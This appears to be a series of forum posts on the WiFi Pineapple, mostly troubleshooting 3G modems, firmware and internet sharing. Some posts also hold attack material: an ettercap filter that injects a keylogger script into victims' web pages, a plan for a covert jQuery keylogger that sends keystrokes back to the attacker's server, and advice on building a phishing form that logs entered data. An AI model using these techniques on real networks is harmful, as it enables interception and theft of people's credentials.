Vulture

You can also just reflash.

Great stuff Mr. Protocol thanx for posting

Sebkinne, would it be possible to get "wash" added, it is the module to reaver that reads WPS enabled APs which would be helpful if we are to debug reaver.

Have you restarted the pineapple since you make that change? I ask because that application sets the vendor and product of the USB Modem.

Telot, care you expand on what you are working on? Video or written? I ask because I was thinking of doing some videos but don't want to overlap.

Cody, The wifipineapple.com site contains many tutorials on getting started and basic understanding of what the pineapple is capable of. You need to connect to the GUI to "easily" start the service you are speaking of. Just go to http://172.16.42.1/pineapple/ and start your service. I would also recommend upgrading to the 1.1.1 firmware found in a sticky on the forum. With the terminal you can review some of the logs, such as the DNSSpoof log and the URLSnarf logs found in /www/pineapple/logs/. A mac will be no different than any other device really, the part that changes is when you are trying to share the internet connection from your PC through the pineapple to clients that connect. Which is not needed for just basic testing and learning how to use the device. I would also recommend installing BackTrack using a virtualization tool like VirtualBox or Parallels.

Whistle Master, I think this is going to be one of my favorite plugins by you. I do have some issues with displaying the clients, however it doesn't appear to be a problem with generating the data into the $dumpPath however on line 33 of site_survey_data.php it appears the cat statement is generating a null .tmp file (I have confirmed clients and APs are in the .csv file) so the line 34 command is running against a null data set.

You are correct in the statement that echo will just state whatever you type after it, however you are then using the > character to force the echo statement into the file /proc/sys/net/ipv4/ip_forward Linux reviews the /proc/sys/net/ipv4/ip_forward file to determine if forwarding of the internet interface should be allowed. When set to 1 then you will not only receive internet on the pineapple but also on any clients. When set to 0 then only the pineapple will have internet, no clients will.

After you ran it manually did you see anything in the logs about a connection? If you ls /dev/ttyUSB* do you get anything in return? Also, please verify that your lsusb is not showing a different value than "12d1:1001" for the modem. I have seen them change product codes occasionally depending on the device being removed and re-inserted. Also, when you ran the 3g.sh script manually it should have at least said searching for modem, then printed the "12d1:1001" string, or perhaps something else was printed?

Deathstormer, can you execute the 3G script? It almost looks like it isn't detecting your device as one of the modem choices, notice nothing in your logs after the searching for modem part. Looking online the modswitch errrr may not be an issue.

Death stormer, can you run the following from SSH and provide the outputs? lsusb /www/pineapple/3g/3g.sh ls /dev/ttyUSB* logread (only the info about the connection)

From command line run echo 1 > /proc/sys/net/ipv4/ip_forward That should correct your Internet sharing issue.

JimJensen, That is normal, what are you seeing under the Log when that is run? Specifically anything about chat/ppp or USB. If you see anything about a device serial number, just remove it before posting for your own security. Also, please make sure that you guys have activated and confirmed these modems on windows computers prior to working with them on the pineapple. The pineapple does not support activation of the device.

Guys, post your log information on when it tries to start the connection you should see something like: Jan 1 00:03:55 Pineapple user.notice 3g-hotplug: Starting interface wan2 for device ttyUSB0 Jan 1 00:04:00 Pineapple user.notice root: 3G: firewall stopped Jan 1 00:04:02 Pineapple daemon.notice pppd[2364]: pppd 2.4.5 started by root, uid 0 Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (BUSY) Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (NO CARRIER) Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (ERROR) Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (NO DIAL TONE) Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (NO ANSWER) Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (DELAYED) Jan 1 00:04:04 Pineapple local2.info chat[2390]: report (CONNECT) also issue the "ifconfig 3g-wan2" and post the info too.

White hat, Look up how to create a form in HTML then have it post to a .php page that writes the data to a text file. I am guessing you got this HTML code from somewhere else or a tutorial as it has attributes that are worthless to you. Also this is just going to be a normal page right now not a popup. If you have access to the clients login page I would just copy that then alter the data inside the <form></form> tags. There are examples of this already look at e phishing tutorial on the wiki.

Whistle Master, I am aware of your project and was hoping to work on an enhancement to it, based off of what Darren posted. My plan is to get this to work globally without the need for the templates or DNSspoof however that requires that I am able to manipulate the data that is sent to the client without totally replacing the domain. Your project has inspired my alteration, and I was combing through the module last night, if what I am doing doesn't work I will probably just shift gears and create a bunch of templates for your module.

Anyone here try using ettercap filters on the pineapple itself and not via a plugged in PC? Ettercap appears to be working quite well except that my filter doesn't actually replace anything into the data stream. Here is pretty much the most generic filter: if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.dst == 80 || tcp.dst == 8080) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.src == 80 || tcp.src == 8080) { if (search(DATA.data, "<head>")){ replace("<head>","<head><script type="text/javascript" src="http://172.16.42.1/kl.js"></script>"); msg("iframe injected after <head>\n"); } if (search(DATA.data, "<HEAD>")){ replace("<HEAD>","<HEAD><script type="text/javascript" src="http://172.16.42.1/kl.js"></SCRIPT>"); msg("iframe injected after <HEAD>\n"); } } The msgs are being triggered, but the stream sent to the client contains none of the replaced data. Also, I noticed when you enable ettercap you must issue the "echo "1" > /proc/sys/net/ipv4/ip_forward" command for ICS to still be enabled. I have tried the following adapters: wlan0, br-lan, 3g-wan2 (Internet) Command I am running: ettercap -T -i 3g-wan2 -q -F test.ef

On step 3 change the line *1410:5031* to *1410:6000* and the modem should work.

SSH into the device and go to /www/pineapples/3g/ and ./3g.sh and let me know the output. Also provide the output of the "lsusb" command.

Whitehat, what you are looking for doesn't really exist in that sort of ease for the most part. There is a modules menu once you upgrade the firmware. Click to show the modules and you can reference their threads on the forum under their names like "key logger". This project is still evolving so not all features are available yet. You can think of the pineapple as a light weight install of backtrack installation. So study up on man in the middle attacks with backtrack. With the pineapple you are the gateway aka the man. So everything you do in those attacks can be done with the pineapple. Not to sound preachy but if you are working to show clients how you did it you should know how the background functions, so you can defeat these types of attacks or at least detect them. For example when you are done using it for attacks you can turn it around to hunt for pineapple style devices and notify you.

All but step #3 you can skip that step. Also I want to reiterate the use of a powered USB hub I believe it is now a necessity for the mc760 modems while using the micro sd slot.

Correction: Out-of-the-Box will need to have the following changes made to get the MC760 working: 1) Update to the latest firmware (1.1.1 at time of writing) 2) Log in to the http://172.16.42.1/pineapple/ interface and go to USB and change to (You will want to follow the swap tutorial by Darren first): config global automount option from_fstab 1 option anon_mount 1 config global autoswap option from_fstab 1 option anon_swap 1 config mount option target /usb option device /dev/sda option fstype ext4 option options rw,sync option enabled 1 option enabled_fsck 0 config mount option target /usb option device /dev/sda1 option fstype ext4 option options rw,sync option enabled 1 option enabled_fsck 0 config swap option device /dev/sda2 option enabled 1 3) Goto the 3G menu and replace your "Mobile Broadband Connection" with: #!/bin/sh # --------------------------------------------------------- # 3G Connection Script for WiFi Pineapple. "Does the thing" # # Version: 2012-02-17 # Supports: # # ZTE MF591 (T-Mobile) -dkitchen # Novatel MC760 (Virgin) -dkitchen # Novatel MC760 (Ting) -dkitchen # # Updated: wifipineapple.com # --------------------------------------------------------- # ----------------------------------------------------------- # Configure /etc/ppp/options with hard-coded working settings # ----------------------------------------------------------- echo " logfile /dev/null noaccomp nopcomp nocrtscts lock maxfail 0" > /etc/ppp/options *1410:6002* | *1410:5031*) echo "Novatel MC760 (Virgin Mobile) detected. Attempting mode switch" uci delete network.wan2 uci set network.wan2=interface uci set network.wan2.ifname=ppp0 uci set network.wan2.proto=3g uci set network.wan2.service=cdma uci set network.wan2.device=/dev/ttyUSB0 uci set network.wan2.username=internet uci set network.wan2.password=internet uci set network.wan2.defaultroute=1 uci set network.wan2.ppp_redial=persist uci set network.wan2.peerdns=0 uci set network.wan2.dns=8.8.8.8 uci set network.wan2.keepalive=1 uci set network.wan2.pppd_options=debug uci set network.wan2.pppd_options=noauth uci commit network usb_modeswitch -v 1410 -p 5031 -V 1410 -P 6002 -M 5553424312345678000000000000061b000000020000000000000000000000 -n 1 -s 20 sleep 10; rmmod usbserial sleep 3; insmod usbserial vendor=0x1410 product=0x6002 sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop logger "3G: firewall stopped" iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT ;; esac 4) Then go to the Jobs menu and remove "/www/pineapple/3g/3g.sh" from the "Execute on Boot:" section. 5) Reboot the device under the Advanced menu and wait 5 minutes. All this is corrected on the most recent code.

Darren, Didn't even think about that, genius.... Please correct any of the following if this was not your intention. Whistle Master, I think Darren is alluding to having a JavaScript function that is loaded on every page (would have to be an ettercap filter) the script would be listening for keys to be pressed via jQuery's http://api.jquery.com/keypress/ function since keylogger already uses the jQuery library, then have it make a call back to the server and upload the data via a simple php script. This would actually be quite amazing since the user would be able to pass to their site unaffected, the DNS Spoof functionality would not need to be enabled, and the user would have little knowledge of what is going on, even if they were to be watching a Firebug console log. We also eliminate the need for SSLStrip's functionality since we are logging the strokes not the stream.

You will need a micro-sd card to add into the MC760. Then I would also wait until the next firmware to really have this functionality working as Sebkinne has alluded to some features that will really make use of the extra space on the micro-sd card. If you want to get this working right now, then I would read through the information others have posted regarding the MC760 and getting the sd card mounted and adding swap to the sd card (by Darren). One issue I and others are running into with the MC760 is the power consumption, you may need an external usb hub that is powered, the key word is powered so that the device does not randomly lose connection and need to be replugged to get the 3g working again. There are many great modules being developed and I would recommend exploring them to see if they meet your needs. You should also state what your objective is. Are you phishing, "rick rolling", cracking WEP/WPA networks? The scripts that you will need will depend greatly on your goals. I have personally found this device to be an amazing little piece of hardware and for anyone who knows the basics of BackTrack or Linux in general this device can be custom tailored for your needs. Based on your 3G/Karma/URL Snarf/Save Packets you can accomplish this fairly easy without any modifications, just need that sd card.

Also interested in assisting with beta testing. I can provide accurate and detailed bug reporting, not just "X is broke", and possibly a resolution.